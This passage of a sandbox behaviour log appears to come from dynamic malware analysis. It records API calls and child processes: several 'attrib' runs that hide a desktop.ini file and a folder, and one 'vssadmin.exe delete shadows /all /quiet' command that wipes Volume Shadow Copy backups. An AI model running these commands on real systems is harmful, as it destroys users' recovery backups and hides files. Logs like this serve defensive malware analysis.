dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0207.808] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0207.808] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12ee68*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12eeb4 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" ", lpProcessInformation=0x12eeb4*(hProcess=0x4c, hThread=0x50, dwProcessId=0x87c, dwThreadId=0x8b8)) returned 1 [0207.810] CloseHandle (hObject=0x50) returned 1 [0207.810] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0207.810] GetEnvironmentStringsW () returned 0x232d50* [0207.810] FreeEnvironmentStringsW (penv=0x232d50) returned 1 [0207.810] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0207.843] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x12eda8 | out: lpExitCode=0x12eda8*=0x0) returned 1 [0207.843] CloseHandle (hObject=0x4c) returned 1 [0207.843] _vsnwprintf (in: _Buffer=0x12eef0, _BufferCount=0x13, _Format="%08X", _ArgList=0x12edb4 | out: _Buffer="00000000") returned 8 [0207.843] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0207.844] GetEnvironmentStringsW () returned 0x232d50* [0207.844] FreeEnvironmentStringsW (penv=0x232d50) returned 1 [0207.844] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0207.844] GetEnvironmentStringsW () returned 0x232d50* [0207.844] FreeEnvironmentStringsW (penv=0x232d50) returned 1 [0207.844] DeleteProcThreadAttributeList (in: lpAttributeList=0x12ee0c | out: lpAttributeList=0x12ee0c) [0207.844] GetConsoleTitleW (in: lpConsoleTitle=0x12f1f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.844] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0207.844] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0207.844] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.844] FindClose (in: hFindFile=0x230830 | out: hFindFile=0x230830) returned 1 [0207.845] FindClose (in: hFindFile=0x230830 | out: hFindFile=0x230830) returned 1 [0207.845] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0207.845] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0207.845] GetConsoleTitleW (in: lpConsoleTitle=0x12ef84, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.845] InitializeProcThreadAttributeList (in: lpAttributeList=0x12ee0c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12eed4 | out: lpAttributeList=0x12ee0c, lpSize=0x12eed4) returned 1 [0207.845] UpdateProcThreadAttribute (in: lpAttributeList=0x12ee0c, dwFlags=0x0, Attribute=0x60001, lpValue=0x12eecc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12ee0c, lpPreviousValue=0x0) returned 1 [0207.845] GetStartupInfoW (in: lpStartupInfo=0x12edc8 | out: lpStartupInfo=0x12edc8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0207.845] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0207.845] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12ee68*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12eeb4 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\"", lpProcessInformation=0x12eeb4*(hProcess=0x50, hThread=0x4c, dwProcessId=0xff0, dwThreadId=0xec8)) returned 1 [0207.847] CloseHandle (hObject=0x4c) returned 1 [0207.847] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0207.847] GetEnvironmentStringsW () returned 0x233790* [0207.847] FreeEnvironmentStringsW (penv=0x233790) returned 1 [0207.847] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0207.907] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12eda8 | out: lpExitCode=0x12eda8*=0x0) returned 1 [0207.907] CloseHandle (hObject=0x50) returned 1 [0207.907] _vsnwprintf (in: _Buffer=0x12eef0, _BufferCount=0x13, _Format="%08X", _ArgList=0x12edb4 | out: _Buffer="00000000") returned 8 [0207.907] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0207.907] GetEnvironmentStringsW () returned 0x233790* [0207.907] FreeEnvironmentStringsW (penv=0x233790) returned 1 [0207.907] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0207.907] GetEnvironmentStringsW () returned 0x233790* [0207.907] FreeEnvironmentStringsW (penv=0x233790) returned 1 [0207.907] DeleteProcThreadAttributeList (in: lpAttributeList=0x12ee0c | out: lpAttributeList=0x12ee0c) [0207.907] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.907] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0207.907] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.908] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0207.908] _get_osfhandle (_FileHandle=0) returned 0x3 [0207.908] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0207.908] SetConsoleInputExeNameW () returned 0x1 [0207.908] GetConsoleOutputCP () returned 0x1b5 [0207.908] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0207.908] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.908] exit (_Code=0) Process: id = "502" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16e00" os_pid = "0x95c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "501" os_parent_pid = "0x86c" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30619 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30620 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30621 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30622 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 30623 start_va = 0xd80000 end_va = 0xd86fff entry_point = 0xd80000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 30624 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30625 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30626 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30627 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 30628 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30629 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30630 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30631 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30632 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 30633 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 30634 start_va = 0x6dc00000 end_va = 0x6dc1cfff entry_point = 0x6dc00000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 30635 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30636 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30637 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30638 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30639 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30640 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30641 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30642 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30643 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30644 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30645 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30646 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 30647 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30648 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 699 os_tid = 0xe00 Process: id = "503" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16e00" os_pid = "0x87c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "501" os_parent_pid = "0x86c" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30649 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30650 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30651 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30652 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 30653 start_va = 0xf50000 end_va = 0xf56fff entry_point = 0xf50000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 30654 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30655 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30656 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30657 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 30658 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30659 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30660 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30661 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30662 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 30663 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 30664 start_va = 0x6dc20000 end_va = 0x6dc3cfff entry_point = 0x6dc20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 30665 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30666 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30667 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30668 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30669 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30670 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30671 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30672 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30673 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30674 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30675 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30676 start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 30677 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30678 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 700 os_tid = 0x8b8 Process: id = "504" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16e00" os_pid = "0xff0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "501" os_parent_pid = "0x86c" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30679 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30680 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30681 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30682 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 30683 start_va = 0xd00000 end_va = 0xd06fff entry_point = 0xd00000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 30684 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30685 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30686 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30687 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 30688 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30689 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30690 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30691 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 30692 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30693 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 30694 start_va = 0x6dc00000 end_va = 0x6dc1cfff entry_point = 0x6dc00000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 30695 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30696 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30697 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30698 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30699 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30700 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30701 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30702 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30703 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30704 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30705 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30706 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 30707 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30708 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 701 os_tid = 0xec8 Process: id = "505" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x7ea16ce0" os_pid = "0xf90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "59" os_parent_pid = "0xe7c" cmd_line = "vssadmin.exe delete shadows /all /quiet" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30709 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30710 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30711 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30712 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 30713 start_va = 0x960000 end_va = 0x97efff entry_point = 